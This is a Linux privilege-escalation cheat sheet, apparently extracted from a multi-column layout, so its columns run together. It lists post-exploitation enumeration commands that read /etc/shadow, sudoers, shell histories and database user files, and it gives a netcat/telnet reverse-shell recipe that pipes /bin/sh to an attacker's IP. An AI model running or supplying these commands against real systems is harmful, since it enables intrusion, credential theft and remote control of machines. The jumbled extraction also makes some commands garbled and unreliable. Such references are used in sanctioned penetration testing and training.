Privilege Escalation Cheatsheet V1

Operating System Applications & Services Communications &

Distro & Version Running Services with User Stat Networking
ps aux
cat /etc/issue
ps -ef What NIC(s) System have is it
cat /etc/*-release
cat /etc/lsb-release top Connected to Another
cat/etc/services
Kernal Verison Network
cat /proc/version Service running by root /sbin/ifconfig -a

cat /etc/network/interfaces
uname -a
ps aux | grep root cat /etc/sysconfig/network
uname -mrs
ps -ef | grep root
rpm -q kernel What Network configuration
dmesg | grep Linux
Installed Application & Version settings ? What about Network
ls /boot | grep vmlinuz- ls -alh /usr/bin/
Environmental variables ls -alh /sbin/ ? DHCP server? DNS server?
dpkg -l
cat /etc/profile
rpm -qa Gateway?
cat /etc/bashrc
ls -alh /var/cache/apt/archivesO
cat ~/.bash_profile cat /etc/resolv.conf
ls -alh /var/cache/yum/
cat ~/.bashrc cat ~/.bash_logout cat /etc/sysconfig/network
env Service(s) settings misconfigured cat /etc/networks
set iptables -L
& Check if Vulnerability Occurs hostname
Is there a printer? cat /etc/syslog.conf dnsdomainname
cat /etc/chttp.conf
lpstat -a
cat /etc/lighttpd.conf Other users & hosts
Interesting in the cat /etc/cups/cupsd.conf communicating with the system?
cat /etc/inetd.conf
home directorie(s)? cat /etc/apache2/apache2.conf lsof -i

cat /etc/my.conf lsof -i :80

ls -ahlR /root/
cat /etc/httpd/conf/httpd.conf grep 80 /etc/services
ls -ahlR /home/
cat /opt/lampp/etc/httpd.conf netstat -antup
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/ netstat -antpx
What user information can netstat -tulpn
Sheduled Jobs chkconfig --list
be found? crontab -l chkconfig --list | grep 3:on
ls -alh /var/spool/cron last
cat ~/.bashrc
cat ~/.profile ls -al /etc/ | grep cron w
cat /var/mail/root ls -al /etc/cron*
cat /var/spool/mail/root cat /etc/cron*
Whats cached? IP and/or MAC
cat /etc/at.allow
User being doing? Is there cat /etc/at.deny addresses
arp -e
cat /etc/cron.allow
any password in plain text? cat /etc/cron.deny
route
/sbin/route -nee
What have they been cat /etc/crontab
cat /etc/anacrontab
edting? cat /var/spool/cron/crontabs/root Packet sniffing possible?
cat ~/.bash_history
What can be seen? Listen to
cat ~/.nano_history
cat ~/.atftp_history
live traffic
cat ~/.mysql_history
cat ~/.php_history tcpdump tcp dst 192.168.1.7 80 and tcp dst
10.5.5.252 21
Note: tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]

Have you got a shell? Can Confidential Information & Users Who are you? Who is logged in?
you interact with the Who has been logged in? Who else is there? Who can do what?
system? id
who Are there any passwords in; scripts,
nc -lvp 4444 # Attacker. Input (Commands) w
nc -lvp 4445 # Attacker. Ouput (Results) last databases, configuration files or log
telnet [attackers ip] 44444 | /bin/sh | [local ip] cat /etc/passwd | cut -d: -f1
44445 # On the targets system. Use the attackers # List of users files? Default paths and locations for
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'
IP!
# List of super users passwords
awk -F: '($3 == "0") {print}' /etc/passwd
What sensitive files can be # List of super users cat /var/apache2/config.inc
cat /etc/sudoers sudo -l cat /var/lib/mysql/mysql/user.MYD
found? cat /root/anaconda-ks.cfg

cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/

@Aacle_